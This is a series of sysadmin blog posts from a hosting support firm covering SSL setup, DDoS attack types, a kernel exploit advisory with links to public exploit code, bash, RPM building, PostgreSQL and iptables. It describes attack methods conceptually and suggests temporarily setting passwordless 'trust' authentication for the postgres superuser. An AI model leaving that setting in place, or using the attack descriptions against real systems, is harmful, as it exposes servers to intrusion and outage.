SupportSages » Security

SSL Installation in a cPanel based server

vince — Sat, 06 Aug 2011 10:14:00 +0000

What is SSL

SSL (Secure Sockets Layer) is a cryptographic protocol which ensure the security of communication over the Internet. SSL encrypt the segments of network connections above the Transport Layer, using symmetric cryptography for privacy and a keyed message authentication code for message reliability.

How SSL works

Web servers and Web browsers rely on the SSL protocol to create a unique encrypted channel for private communications over the Internet. The SSL Certificate consists of a public key and a private key. The public key is used to encrypt information and the private key is used to decrypt it. When a Web browser points to a domain which is secured by SSL, a level of encryption is established based on the type of SSL Certificate as well as the client Web browser, operating system and host server’s capabilities. This is why SSL certificates feature a different range of encryption levels.

Obtaining an SSL Certificate

Domain example.com needs an SSL Certificate. The following steps are involved in it :

a) Example.com generates a CSR (Certificate Signing Request) and during this process, a private key is generated.
b) With this CSR, Example.com goes to a trusted, third party Certificate Authority like Verisign. They take the Certificate Signing Request and validates example.com. The Certificate Authority validates example.com.
c) When the validation process is complete, the third party Certificate Authority gives a new public key (certificate) encrypted with their private key.
d) Example.com installs the new certificate and gets secured.

Installing SSL

(i) Through cPanel/WHM
Its quite easy to install SSL through cPanel/WHM interface.

Generating CSR

Under Security tab, click SSL/TLS Manager.

Generate the Private Keys first by accessing the option Generate, view, upload or delete your private keys

Access the option Generate, view, or delete SSL certificate signing requests. Fill in the forms like Domain Name, E-mail Address, Country etc.

You will obtain the CSR. Contact the Certificate provider with this information. The Certificate Authority will then provide the Certificate (CRT). Finally you will have the following files associated with SSL :

CSR in the format domain.com.csr or domain_com.csr

CA bundle, which have the Public key of the Certificate Authority in the format domain.com.cabundle or domain_com.ca-bundle

CRT, the certificate in the format domain.com.crt or domain_com.crt

Private key in the format domain.com.key or domain_com.key

Method 1 : Installing from cPanel

1. Go to SSL/TLS Manager.
2. Click Generate, view, upload, or delete your private keys.
3. Under the Upload a New Certificate section, click on the Browse button (next to Choose a .crt file option) and find the Domain Certificate file (example.crt) that you obtained from the SSL vendor. Alternatively you can paste the Certificate contents on the section Paste the crt below. Make sure to include the BEGIN and END tags, while copying your certificate. Click the Upload button.
4. Go Back and click Return to SSL Manager at the bottom of the page.
5. Click on Setup a SSL certificate to work with your site. If this option is not available, your web host may have disabled it. You will need to contact them for further support.
6. Now, select the domain you are using from the Domain drop down menu. It will attempt to fetch the SSL Certificate and the private key. If this doesn’t work, you may need to contact your web host.
7. In the box labeled CA Bundle paste the contents of the Intermediate certificate (DigiCertCA.crt).
8. Click Install Certificate. Your SSL certificate should now be installed, and the website configured to accept secure connections. You or your web host may need to restart Apache before it will work.

Method 2 : Installing from WHM

You can install SSL certificate from WHM also. Its quite simple when compared to the installation through cPanel. All you need is the root access to WHM. Once you login to the WHM, search for the option Install a SSL Certificate and Setup the Domain.

You’ll find three boxes. Paste the CRT file contents in the first box. It will automatically fetch the Key and CA Bundle (In most cases, CA bundle needs to be fetched manually). Finally click Submit once all the fields are populated. You’ll see a message that indicates the installation is successful

Method 3 : Manual Installation

You need the Server Root shell access for this. Go to the Apache configuration file in the server, in the cPanel case its /usr/local/apache/conf/httpd.conf. Locate the VirtualHost entry configured for SSL. Configure it like :


 ServerName example.com
 ServerAlias www.example.com
 DocumentRoot /home/example/public_html
 SSLEngine on
 SSLCertificateFile /usr/share/ssl/certs/example.com.crt
 SSLCertificateKeyFile /usr/share/ssl/private/example.com.key
 SSLCACertificateFile /usr/share/ssl/certs/example.com.cabundle

where SSLCertificateFile is the SSL certificate file path, SSLCertificateKeyFile is the Key file path, SSLCACertificateFile is the path to the Intermediate file. Make sure you’ve the files in the specified path (It may vary on different scenarios). Restart the Web server and you’re done.

Tweet This Post

DDoS, prevention, cure! – Part 1

Fabian — Wed, 29 Dec 2010 10:54:22 +0000

DDoS – Distributed Denial Of Service Wiki : http://en.wikipedia.org/wiki/Denial-of-service_attack

DDoS is an attack on a computer/server or its resources and thereby making it unavailable to intended users.

Web-hosts must be familiar with this term and will be a victim at-least once. The intention of this post is to give a brief description about DDoS, its prevention and cure if effected. Please note that this will not server as a perfect guide to the mentioned “Subject-line”, but a “tip-note”.

Understanding DDoS:

The four commonly used programs used by attackers to launch DDoS attacks are

Symptoms of DDos:

Unusually slow network performance (opening files or accessing web sites)
Unavailability of a particular web site
Inability to access any web site
Dramatic increase in the number of spam emails received—(this type of DoS attack is considered an e-mail bomb)
Packet loss for pings to IP/Domain

How DDoS is done:

Pictorial representation of Stacheldraht DDoS attack.

In Stacheldraht DDoS attack, the attacker uses a client program to connect handlers which is a set of compromised machines that issues commands to the agents which in-turn facilitate the DDoS attack. The agents are another set of machines which is compromised using handlers by the attacker. Each handler can control thousands of agents and all these widely distributed agents floods the target server and thereby increasing the impact of attack.

DoS and DDoS are not the same:

If the attacker initiates an attack from a single host, it is classified as a DoS as it is not ‘distributed’. In fact, any attack against availability would be classed as a Denial of Service attack. On the other hand, if an attacker uses a thousand systems to simultaneously launch smurf attacks against a remote host, this would be classified as a DDoS attack.

Then what is DRDoS? DRDoS is Distributed Refected Denial of Service. These attacks forge the source address of the IP packets with the victim’s IP and send pings/packets to intermediate hosts. When the intermediate sends back the reply to these pings , it is sent to the victims IP thereby flooding the victim.

Some other types/methods of DDoS/DRDoS/Dos attacks are :

Reflective ICMP attack: The reflective ICMP attack uses public sites like google.com that responds to ICMP ping requests to that of victims IP. The attacker spoofs the victims IP and send requests to the Public servers which will then reply to the actual IP.

TCP SYN flood attack : The attacker sends a packet with SYS bit set of the well known TCP three way handshake. The victim responds to the request by sendong a reply packet with SYN_ACK bit set, but the attackr never responds and thereby increasing the TCP receive queues and denying new TCP connetions. But modern UNIX and Windows fixed this by increasing the queue qize and limited the number of TCP SYS packets allowed.

UDP attacks : The UDP is one of the most effective way of DDos/DoS attacks. UDP is a stateless protocol and does not have any acknowledgement mechanism by design. PROTOS,the SNMP test suite, and other SNMP tools have been used successfully to launch application level DoS attacks. The Slammer worm was extremely fast because it did not require a response from the compromised computer.

TTL Expiration : The attacker forges the victims IP and send packets with low TTL set to it so that it will expire in the transmit at high speed router. When the TTL reaches zero, the router drops the packet and sends an ICMP TTL expired message to the source address, ie the Victim IP. This attack could be lowered by rate limiting ICMP to all routers in the service provider’s network.

Permanent DoS attacks (PDoS) : PDoS is an attack that damages the system so badly that it needs the hardware to be replaced or reinstalled. The PDoS is purely a hardware targeted attack in which the attacker modifies the devide fireware by the legitimate method caled flashing. The attacker replaces the hardware firmware with his own modified version which will make the device unstable and render it from the original purpose for which it is made or designed for. The is done by exploiting the hardware security flaws which will allow remote administration of devices such as routers, printers and other networking hardwares.

Degradation Of Service Attacks : The compromised computers are used by the atackers to launch short-lived flooding on victims website which will slow down the website rather than crashing it. This is degradation of service rather than deniel of service and is more seriver than DoS as this is pretty difficult to detect and resolve.

Un-intentional Denial Of Services : Sudden spike in popularity for a website is the major cause for this. This happens when an extremely popular wesite posts a link to a second site as a part of referrence for news or article. This will lead significant increase in traffic to the secondary website which will result in crashing or server/services. An example for this hapened when Michael Jackson died in 2009 which took down sites like Google and Twitter. (In this case you cant just blame someone )

Blind Denial Of Service : In Blind Deniel of Service, the attacker must be able to receive traffic from the victim, then the attacker must either subvert the routing fabric or use the attacker’s own IP address. Either provides an opportunity for the victim to track the attacker and/or filter out his traffic. With a blind attack the attacker uses a forged IP addresses, making it extremely difficult for the victim to filter out those packets. The TCP SYN flood attack is an example of a blind attack. Designers should make every attempt possible to prevent blind denial of service attacks.

Tweet This Post

CRITICAL : One more kernel exploit known to the public

George — Fri, 17 Sep 2010 13:47:43 +0000

A continuation of the previous exploits. http://isec.pl/vulnerabilities/isec-0025-syscall-emulation.txt

Full Disclosure here - http://seclists.org/fulldisclosure/2010/Sep/268 & mitigation at http://seclists.org/fulldisclosure/2010/Sep/273

Details about the 0 day exploit and how to test whether your system is exploitable or not. However no need to get panicked as this particular exploit was with l33t hackers for last 2 years as you can see at the above link. Now since it is public now, take an extra care if uname -m gives you a x86_64.

http://sota.gen.nz/compat2/

http://sota.gen.nz/compat1/

Two CVE candidates are there – CVE-2010-3081 and CVE-2010-3301. One will affect the server and other don’t.

Temporary solution would be to follow https://access.redhat.com/kb/docs/DOC-40265

Tweet This Post

IFS

victor — Thu, 02 Sep 2010 18:51:19 +0000

How many times have you written scripts and a had bad time with those having spaces? The remedy to this situation is your IFS value.

IFS or Internal Field Seperator holds the value which seperates the various entities. This can be file names, values read into a script by read etc. It is the character or characters designated as whitespace by the operating system.

The IFS is set to the newline and space character. The global variable $IFS stores the value. To view the exact value stored in IFS execute:

echo "$IFS" | cat -vTE
 ^I$
$

Running echo “$IFS” will not give you any visible output (after all, you are going to see a space and a newline). cat -vTE displays non printable characters , tabs as ^I and ends each line with a $ sign.

In a script which utilises filenames (with spaces), it is always preferable to change the IFS to include only the newline character opposed to the default space and newline character. Lets check out one such script which accepts filenames wih spaces. This scripts simply prints the file names in your current directory. (Remember to create some files in your currenct directory which has spaces. You may try the same script removing the lines with the IFS variable in reference to see the difference)

#!/bin/bash
OIFS=$IFS # Original IFS

IFS=$(echo -en "\n\b") # New IFS

for fil in $(ls -1 $PWD); do
	echo $fil
done

IFS=$OIFS # Restore earlier IFS

IFS can also be used to read files with lines sepearated by a special character. For example in the /etc/passwd, to store the various entries like username, homedirectory etc.

The following script uses the while construct to determine the users who have the shell portion as /bin/false

#!/bin/bash

OIFS=$IFS
IFS=':'

while read username password userid groupid comments homedir shell_avail
do
	if [[ $shell_avail == /bin/false ]]; then
                echo "$username has no shell"
        fi

done < /etc/passwd
IFS=$OIFS

In the above script each of the 7 portions of the /etc/passwd file is assigned to the 7 variables
username password userid groupid comments homedir shell_avail with the read command. The if portion in the script compares the seventh variable – shell_avail to /bin/false to determine the username and outputs it.

From now on you can use the IFS variable for all those files with spaces and extracting values separated by a special character.

Tweet This Post

How to create a RPM from source package(Creating CSF RPM)

Fabian — Tue, 24 Aug 2010 08:20:18 +0000

We create RPM’s from the Source for a package. As an initial step, compile and install the source using normal procedures just to confirm all necessary libraries/dependencies are met.

Here I am explaining the whole process to create an RPM for CSF that could be installed on cPanel servers.

Getting ready with the Source Files:

Download Latest CSF from here : http://www.configserver.com/free/csf.tgz

Extract the tarball.

[root@server new]# tar -xvf csf.tgz
[root@server new]# ls
csf  csf.tgz

Install to check all libraries/dependencies are met.

[root@server csf]# cd csf
[root@server csf]# sh install.cpanel.sh
*WARNING* TESTING mode is enabled - do not forget to disable it in the configuration
Installation Completed

We confirmed all libraries/dependencies are met for installing CSF. We need to rename the tarball to define a version so that it could be used in the SPEC file.

[root@server csf]# cd ..
[root@server new]# ls
csf  csf.tgz
[root@server new]#mv csf csf-0.0.1
[root@server new]# tar -cvf csf-0.0.1.tar.gz csf-0.0.1

0.0.1 defines the version. (Can assign any). Now we are ready with the source file for CSF csf-0.0.1.tar.gz that could be used to generate RPM.

Building the RPM:

Install RPMBUILD tool:

[root@server ~]# yum install rpm-build

We never build RPM’s as ‘root’ users, but as normal users, because root can alter any file on the system, it was easy to inadvertently alter a running system by adding extraneous files or removing important files during interim builds of an RPM. Earlier RPM’s were build as root user but recently the RPM system changed to allow any user to build RPMs in a home directory. Building an RPM without the privileges of root prevents changes to core system files and hence we are on the safer side.

Initial Set-up:

We need to create a directory hierarchy for the rpm build tool to work with. To begin with, create a directory under your home directory which will act as the root directory for the build process. Lets make a directory ‘csfrpm’ under home directory for this purpose.

[sage@server ~]$ mkdir -p /home/your_username/csfrpm

[sage@server ~]$ cd /home/your_username/csfrpm

Create Five sub-directories under csfrpm.

[sage@server csfrpm]$ mkdir BUILD RPMS SOURCES SPECS SRPMS

BUILD: BUILD is used as a space to compile the software.
RPMS: RPMS contains the binary RPM that rpmbuild builds.
SOURCES: SOURCES is for source code.
SPECS: SPECS contains your spec file or files—one spec file per RPM you want to build.
SRPMS: SRPMS contains the source RPM built during the process.

[sage@server csfrpm]$ ls
BUILD  RPMS  SOURCES  SPECS  SRPMS

Copy the source code that we have created(csf-0.0.1.tar.gz) to the SOURCES folder. Make sure that the owner for source file is your_username.

[sage@server ~]$ cp csf-0.0.1.tar.gz /home/your_username/csfrpm/SOURCES/

Create the SPEC file:

SPEC file is noting but the configuration for rpmbuild tool.

[sage@server csfrpm]$ vi SPECS/csf.spec

# This is a sample spec file for csf

%define _topdir         /home/your_username/csfrpm
%define name            csf
%define release         0
%define version         0.0.1
BuildRoot: %{_tmppath}/%{name}-%{version}-root
Summary:                GNU csf
License:                GPL
Name:                   %{name}
Version:                %{version}
Release:                %{release}
Source:                 %{name}-%{version}.tar.gz
Group:                  Security/Tools

%description
A Stateful Packet Inspection (SPI) firewall, Login/Intrusion Detection and Security application for Linux servers.

%prep
%setup -q

%install
./install.cpanel.sh prefix=$RPM_BUILD_ROOT/usr/local

%clean
%{__rm} -rf %{buildroot}

%files
%defattr(-,root,root,0755)

Finally Build the RPM:

[sage@server csfrpm]$ rpmbuild -v -bb --clean SPECS/csf.spec

You can see the result if everything went fine:

Processing files: csf-0.0.1-0
Checking for unpackaged file(s): /usr/lib/rpm/check-files /var/tmp/csf-0.0.1-root
Wrote: /home/your_username/csfrpm/RPMS/i386/csf-0.0.1-0.i386.rpm
Executing(%clean): /bin/sh -e /var/tmp/rpm-tmp.84469
+ umask 022
+ cd /home/your_username/csfrpm/BUILD
+ cd csf-0.0.1
+ /bin/rm -rf /var/tmp/csf-0.0.1-root
+ exit 0
Executing(--clean): /bin/sh -e /var/tmp/rpm-tmp.84469
+ umask 022
+ cd /home/yuor_username/csfrpm/BUILD
+ rm -rf csf-0.0.1
+ exit 0

The RPM is written to /home/your_username/csfrpm/RPMS/i386/csf-0.0.1-0.i386.rpm

Tweet This Post

PostgreSQL for the sage – Must know basics for the system administrators

victor — Thu, 05 Aug 2010 16:24:44 +0000

PostgreSQL or Postgres is an object-relational database management system (ORDBMS). Unlike MySQL, PostgreSQL is not controlled by any single company, it is a community developed project. It is a advanced version of the ‘Ingres’ Database project (which is how the project gets the name post-ingres or postgres ).

Postgres is one of the best open-source database alternative which is fully object oriented and transactions compliant. It has stored procedures, multiple views and a huge set of datatypes. Some of the other notable features are as follows.

Objects and Inheritance

Database consists of objects and the database administrators can design custom or user-defined objects for the tables. Inheritance is another feature. Tables can be set to inherit their characteristics from a “parent” table.

Functions

Functions can be used in Postgres. These can be written in the postgres’ own procedural language called ‘PL/pgSQL’ which resembles Oracle’s procedural language ‘PL/SQL’ or any other common scripting languages which support posgtres’ procedural language like PL/Perl, plPHP, PL/Python, PL/Ruby etc. Run the following in the psql client to determine if functions is enabled:

SELECT true FROM pg_catalog.pg_language WHERE lanname = 'plpgsql';

To create user-defined functions we use the CREATE OR REPLACE FUNCTION command. Example:

CREATE OR REPLACE FUNCTION fib (

fib_for integer

) RETURNS integer AS $$

BEGIN

IF fib_for < 2 THEN

RETURN fib_for;

END IF;

RETURN fib(fib_for - 2) + fib(fib_for - 1);

END;

$$ LANGUAGE plpgsql;

Indexes

An index is like a summary of a certain portion of the table. It is an optimization technique which increases speed of accessing records from a database. PostgreSQL supports indexes like Btree, hash etc. User-defined index methods can also be created. Indexes are created on tables with respect to a particular field (based on which there are a number of queries). As an example for a table:

CREATE TABLE name (

id integer,

fname varchar

lname varchar

);

To create an index on table name with respective to the field id (as there are many queries on this table requesting for firstname or lastname from the id provided), we use the index:

CREATE INDEX name_id_index ON name (id);

Triggers

Triggers are events or functions run upon the action of certain SQL statements which modify data in some records. Depending on the kind of modification we can have multiple triggers in a database. Postgres supports multiple triggers written in PL/PgSQL or it’s scripting counterparts like PL/Python. The trigger function must be defined before the trigger can be created. The trigger function must be declared as a function taking no arguments and returning type trigger. CREATE TRIGGER command is used to declare triggers.

Concurrency

PostgreSQL ensures concurrency with the help of MVCC (Multi-Version Concurrency Control), which gives the database user a “snapshot” of the database, allowing changes to be made without being visible to other users until a transaction is committed.

PostgreSQL’s MVCC keeps all of the versions of the data together in the same partition in the same table. By identifying which rows were added by which transactions, which rows were deleted by which transactions, and which transactions have actually committed, it becomes a straightforward check to see which rows are visible for which transactions.

Inorder to accomplish this, Rows of a table are stored in PostgreSQL as a tuple. Two fields of each tuple are xmin and xmax. Xmin is the transaction ID of the transaction that created the tuple. Xmax is the transaction ID of the transaction that deleted it (if any).

Along with the tuples in each table, a record of each transaction and its current state (in progress, committed, aborted) is kept in a universal transaction log.

When data in a table is selected, only those rows that are created and not destroyed are seen. That is, each row’s xmin is observed. If the xmin is a transaction that is in progress or aborted, then the row is invisible. If the xmin is a transaction that has committed, then the xmax is observed. If the xmax is a transaction that is in progress or aborted and not the current transaction, or if there is no xmax at all, then the row is seen. Otherwise, the row is considered as already deleted.

Insertions are straightforward. The transaction that inserts the tuple simply creates it with the xmax blank and the xmin set to its transaction ID. Deletions are also straightforward. The tuple’s xmax is set to the current transaction. Updates are no more than a concurrent insert and delete.

Views

A view is a table which does not exist in the database. It is a virtual table created from fields in various tables and is joined together based on some criteria. Views can be used in place of tables and will accomplish the task same as that of a table. The CREATE VIEW statement is used to accomplish this eg:

CREATE VIEW best_sellers AS

SELECT * FROM publishers WHERE demand LIKE 'high';

Foreign Keys

The primary key used in one table which is used to refer to the records in a second table is called the foreign key of the second table.

CREATE TABLE products (
    product_no integer PRIMARY KEY,
    name text,
    price numeric
);
CREATE TABLE orders (
    order_id integer PRIMARY KEY,
    product_no integer REFERENCES products (product_no),
    quantity integer
);

Here product_no is the foreign key in the second table created. The foreign key field may have values which are repeated unlike primary keys.

Files Users and Configuration

The main configuration file of Postgres is postgresql.conf. This can be located in the ‘data’ directory. It may be present either in /var/lib (/var/lib/pgsql/data/postgresql.conf) or /usr/local (/usr/local/pgsql/data/postgresql.conf). Temporary changes to the configurations can be made using postmaster command.

The init script that starts the postgres service is /etc/init.d/postgresql . It runs a number of child processes concurrently. The postgres server process is postmaster. These processes and files associated with PosgreSQL are owned by the user/group postgres. The default port used for database connections is 5432

The user postgres is the PostgreSQL database superuser. We can create a number of super users for the database (this accomplished by the create role command ), however, the default super user is postgres. The postgres user has the privilege to access all the databases and files in the server (Unless the user root is created in postgres as a superuser).

Client Authentication is controlled by the file pg_hba.conf in the data directory, e.g., /var/lib/pgsql/data/pg_hba.conf. (HBA stands for host-based authentication.)

Each record specifies a connection type, a client IP address range (if relevant for the connection type), a database name or names, and the authentication method to be used for connections matching these parameters.A record is typically in one of two forms:

local database authentication-method [ authentication-option ]

host database IP-address IP-mask authentication-method [ authentication-option ]

local : This record pertains to connection attempts over Unix domain sockets.

host : This record pertains to connection attempts over TCP/IP networks.

database : Specifies the database that this record applies to. The value all specifies that it applies to all databases, while the value sameuser identifies the database with the same name as the connecting user.

authentication methods

trust: The connection is allowed unconditionally.

reject: The connection is rejected unconditionally.

password: The client is required to supply a password which is required to match the database password that was set up for the user.

md5: Like the password method, but the password is sent over the wire encrypted using a simple challenge-response protocol.

ident: This method uses the “Identification Protocol” as described in RFC 1413. It may be used to authenticate TCP/IP or Unix domain socket connections, but its reccomended use is for local connections only and not remote connections.

Front-ends

The minimalistic front-end for PostgreSQL is the psql command-line. It can be used to enter SQL queries directly, or execute them from a file. phpPgAdmin is a web-portal used for PostgreSQL administration written in PHP and based on the popular phpMyAdmin. Likewise pgAdmin is a graphical front-end administration tool for PostgreSQL, which has support on multiple platforms. The latest stable version of the same is pgAdmin III.

Some administration related commands

Command to login to psql database mydb as user myuser:

psql -d mydb -U myuser

Command to login to psql database mydb as user myuser on a different host myhost:

psql -h myhost -d mydb -U myuser

If the port the server runs is different we use -p [port number] . Upon entering the psql shell the prompt will show the database name currently being used. In the above example it will show

mydb=> (if logged in as an ordinary user )

mydb=# (if logged in as a super user like postgres)

Create a PostgreSQL user

There are two ways to create a postgres database user. The only user initially allowed to create users is postgres. So one has to switch to this user before creating other users with varying privileges.

1. Creating the user in the shell prompt, with createuser command.

switch to the postgres user with:

su - postgres

createuser tom

Shall the new role be a superuser? (y/n) n

Shall the new role be allowed to create databases? (y/n) y

Shall the new role be allowed to create more new roles? (y/n) n

2. Creating the user in the PSQL prompt, with CREATE USER command.

switch to the postgres user with:

su - postgres

create user mary with password 'marypass';

Creating and deleting a PostgreSQL Database

There are two way to create databases.

1. Creating database in the PSQL prompt, with createuser command.

CREATE DATABASE db1 WITH OWNER tom;

2. Creating database in the shell prompt, with createdb command.

createdb db2 -O mary

To delete an entire database from within the psql prompt do :

DROP DATABASE db1;

Determining execution time of a query

Turn on timing with

\timing

Now execute the qery:

SELECT * from db1.employees ;

Time: 0.065 ms

Calculate postgreSQL database size in disk

SELECT pg_database_size('db1');

to get the values in human readable format

SELECT pg_size_pretty(pg_database_size('db1'));

to calculate postgreSQL table size in disk

SELECT pg_size_pretty(pg_total_relation_size(‘big_table’));

Slash commands used in psql

To list all slash commands and thier purpose. Login to psql and issue to the command \? . Some of the most commonly used slash commands are the following:

List databases	\l
System tables	\dS
Types	\dT
Functions	\df
Operators	\do
Aggregates	\da
Users	\du
Quit from psql	\q
Connect to different database db2	\c db2
Describe Table/index/view/sequence	\d

The below can be used with a specific table/index/view name for description of the specific table/index/view

Tables	\dt
Indexes	\di
Sequences	\ds
Views	\dv

Useful Bash commands

Bash command to list all the postgresql databases:

psql -l #This can be run as a unix user who is also a super user in postgresql

Indirect bash command to list all the postgresl users:

psql -c '\du' #-c is used to run an internal or sql command in psql shell

Backing up and restoring databases

To dump the database to an sql file use the bash command:

pg_dump mydb > db.out

To restore a database from an sql backup file (via bash)

psql -d newdb -f backupdb.out

or

psql -f backupdb.out newdb

(here the database newdb must be already created and the file backupdb.out must be present in the current directory)

To take the backup of all the Postgres databases in the server:

pg_dumpall > /var/lib/pgsql/backups/dumpall.sql

(Only possible with the postgres or the database superuser )

Resetting database user’s password

To change the password for a database user (say ‘thomas’):

ALTER USER thomas WITH PASSWORD 'newpassword';

This same command can be used to reset the password for the postgresql super user postgres, but in this case, you will have to enable password less login for postgres user by adding the following line to the top of the file pg_hba.conf in the data directory of postgres. Once the password is reset this line can be removed:

local	all	postgres	trust

Next we issue the same command but for the user postgres

ALTER USER postgres WITH PASSWORD 'newpassword';

To create a super user via bash with multiple roles

createuser -sPE mysuperuser

Instead of this we can also use the below psql shell command:

CREATE ROLE mysuperuser2 WITH SUPERUSER CREATEDB CREATEROLE LOGIN ENCRYPTED PASSWORD 'mysuperpass2';

Physical database files in postgres

The files in data/base are named by the oid (Object Identifier) of the database record in

pg_database, like this:

cd /var/lib/pgsql/data/base

ls -l

total 33

drwx------ 22 postgres postgres 4096 Jul 23 20:06 ./

drwx------ 11 postgres postgres 4096 Aug  1 05:59 ../

drwx------  2 postgres postgres 4096 Jun 20 09:32 1/

drwx------  2 postgres postgres 4096 Mar  3 13:36 10792/

drwx------  2 postgres postgres 4096 Jun 20 15:09 10793/

drwx------  2 postgres postgres 4096 May 27 01:40 16497/

drwx------  2 postgres postgres 4096 May 27 01:40 16589/

drwx------  2 postgres postgres 4096 Jun 20 10:28 16702/

drwx------  2 postgres postgres 4096 May 27 01:40 16764/

drwx------  2 postgres postgres 4096 May 27 01:40 16785/

drwx------  2 postgres postgres 4096 Aug  1 04:37 16786/

drwx------  2 postgres postgres 4096 Aug  1 04:36 19992/

drwx------  2 postgres postgres 4096 May 27 01:40 19997/

To obtain the oid, execute the following command in psql prompt

postgres=# select oid,datname from pg_database order by oid;

   oid  |         datname

---------+--------------------------

1 | template1

10792 | template0

10793 | postgres

16497 | gadgetwi_Unable

16589 | vimusicc_filehost

16702 | personea_altissimo

16764 | shopping_businessfinance

16785 | ansonyi_wp2

16786 | ansonyi_wp

19992 | globook_PostgreSQL

Tweet This Post

How to recompile Kernel?

George — Sat, 03 Oct 2009 08:45:20 +0000

Kernel Recompilation

Compiling custom kernel has its own advantages and disadvantages. It helps to optimize the kernel to your environment (hardware and usage patterns). I shall try to guide you through Kernel recompilation process.

Step 1:

Download the kernel source

cd /usr/local/src

wget http://www.kernel.org/pub/linux/kernel/v2.6/linux-x.y.z.tar.bz2

Note: Replace x.y.z with actual version number.

Step 2:

Extract the source file

tar -xjvf linux-x.y.z.tar.bz2

Step 3:

Patching the Kernel

If you are requested to apply any patches , follow these steps

a) Move the downloaded kernel patch to the /usr/local/src directory.

b) Extract the patch file

c) Patch the kernel source using the extracted patch file

cd /usr/local/src/linux-x.y.z

patch -p1 < patchfile-2.2.x

Now the Kernel Source is patched against known vulnerabilities.

Step 4:

Configuration

If you are trying to upgrade the Kernel of already running server , it is always better use the existing configuration. To do this follow these steps

#uname -a
Linux Server1 2.6.18-164.el5 #1 SMP Thu Sep 3 03:28:30 EDT 2009 x86_64 x86_64 x86_64 GNU/Linux

# cd /boot

There you can see different configuration files as given below

#ls

config-2.6.18-128.el5 initrd-2.6.18-128.el5.img message
config-2.6.18-164.el5 initrd-2.6.18-164.el5.img quota.user*

identify the configuration file corresponding to the version of OS installed , In our case it is config-2.6.18-164.el5 . We are copying this file to the downloaded kernel source to use it during configuration.

#cp -p config-2.6.18-164.el5 /usr/local/src/linux-x.y.z/.config

# make clean

# make mrproper

# make menuconfig

You have to select different options as per your need. If you intended to use the existing configuration ,specify the path to the file ( .config in this case) by selecting the option

“Load an Alternative configuration file”

Step 5: Compilation

Compile the Kernel using the following commands

Compile to create a compressed kernel image

# make

Compile kernel modules:

# make modules

Install kernel modules

# make modules_install

Step 6: Install Kernel

If the above steps completed without any errors , now its the time to Install the new Kernel

# make install

It will install three files into /boot directory as well as modification to your kernel grub configuration file:

System.map-x.y.z

config-x.y.z

vmlinuz-x.y.z

Step 7: Create the Initrd image

Type the following command :

# cd /boot

# mkinitrd -o initrd.img-x.y.x x.y.z

initrd images contains device driver which needed to load rest of the operating system later on. Not all computer requires it, but it is better to create one

Step 8: Boot Loader Modification

Mofdify the boot loader to boot the new OS as default . Check the documentaions corresponding to your boot loader

Step 9: The last step

execute the following command

#reboot

Wait a few minutes and once it is up , you can see that the new Kernel is loaded

Tweet This Post

How to enable IPtable modules on a VPS

Fabian — Wed, 12 Aug 2009 05:19:26 +0000

Before trying to enable iptable modules on the VPS, make sure that those modules are enabled on the root node server. To check whether the particular iptable modules are enabled or not on the root node, execute the following command.

lsmod

A Sample out put for the lsmod is :

Module                  Size Used by
xt_helper              35584 0
ip_conntrack_ftp       42320 2
ipt_LOG                39808 0
ipt_owner              34944 0
ipt_REDIRECT           34944 0
ipt_recent             43404 2
xt_state               35200 5
sch_sfq                38912 1
cls_u32                41352 1
sch_cbq                50688 1
ppp_deflate            39168 0
zlib_deflate           52760 1 ppp_deflate
ppp_async              45184 0
ppp_generic            62624 2 ppp_deflate,ppp_async
slhc                   39552 1 ppp_generic
crc_ccitt              35200 1 ppp_async
tun                    47872 0
vzethdev               47264 0
simfs                  38296 36
vzrst                 173096 0
vzcpt                 148792 0
vzdquota               78832 36 [permanent]
xt_tcpudp              36224 21
xt_length              34944 0
ipt_ttl                34816 0
xt_tcpmss              35328 0
ipt_TCPMSS             37248 0
iptable_mangle         37888 36
xt_multiport           36224 0
xt_limit               36352 4
ipt_tos                34560 0
ipt_REJECT             39556 1
iptable_nat            43532 46
ip_nat                 53392 3 ipt_REDIRECT,vzrst,iptable_nat
iptable_filter         37760 42
ip_conntrack          100884 29 xt_helper,ip_conntrack_ftp,xt_state,vzrst,vzcpt,iptable_nat,ip_nat
nfnetlink              40392 2 ip_nat,ip_conntrack
ip_tables              57440 3 iptable_mangle,iptable_nat,iptable_filter
x_tables               52744 17 xt_helper,ipt_LOG,ipt_owner,ipt_REDIRECT,ipt_recent,xt_state,xt_tcpudp,xt_length,ipt_ttl,xt_tcpmss,ipt_TCPMSS,xt_multiport,xt_limit,ipt_tos,ipt_REJECT,iptable_nat,ip_tables
autofs4                57480 2
hidp                   83584 2
rfcomm                105000 0

Here we can see most of the modules are already enabled on the node server. If not enabled, execute the following commands one by one to enable those.

modprobe ipt_helper
modprobe ipt_REDIRECT
modprobe ipt_state
modprobe ipt_TCPMSS
modprobe ipt_LOG
modprobe ipt_TOS
modprobe iptable_nat
modprobe ipt_length
modprobe ipt_tcpmss
modprobe iptable_mangle
modprobe ipt_limit
modprobe ipt_tos
modprobe iptable_filter
modprobe ipt_helper
modprobe ipt_tos
modprobe ipt_ttl
modprobe ipt_REJECT
modprobe ipt_helper
modprobe ipt_owner

Next step is to enable these modules on the VPS.

Stop the container first : vzctl stop 960 ( replace 960 with the concerned VPS ID )

Execute the following command :

vzctl set 960 –iptables ipt_REJECT –iptables ipt_tos –iptables ipt_TOS –iptables ipt_LOG –iptables ip_conntrack –iptables ipt_limit –iptables ipt_multiport –iptables iptable_filter –iptables iptable_mangle –iptables ipt_TCPMSS –iptables ipt_tcpmss –iptables ipt_ttl –iptables ipt_length –iptables ipt_state –iptables iptable_nat –iptables ip_nat_ftp –iptables ip_conntrack_ftp –iptables ip_conntrack_irc –iptables ip_nat_irc –iptables ipt_owner –iptables ipt_helper –save

Start the container : vzctl start 960

check whether the modules are enabled from the configuration file cat /etc/vz/conf/960.conf. You are DONE.

Please note that if the command “vzctl set 960 –iptables ipt_ ….” is executed for the second time for the same VPS, it will over write the previous configuration.

For enabling it on all VPSes, please add to /etc/sysconfig/vz all those modules like IPTABLES=”module1 module2 ….etc”

Tweet This Post

Chapter 2 Why Linux is important?

Fabian — Sun, 03 May 2009 10:26:36 +0000

Linux has its own importance nowadays days due to the following reasons, which other OS’s may not have !

Freedom’s in Linux :-

If you have been following the Open Source movement, you know I am not talking about the price of the software when I say freedom.

Free not as in free drinks. But Free as in Freedom or Free speech. In most cases, you get free drinks though

Freedom 0 – The freedom to run the program, for any purpose :-
Yes, the users have the freedom to run the program for any purposes like software development, animation, designing, desktops etc. We can run the program without any prior license from any authorities.

Freedom 1 – The freedom to study.
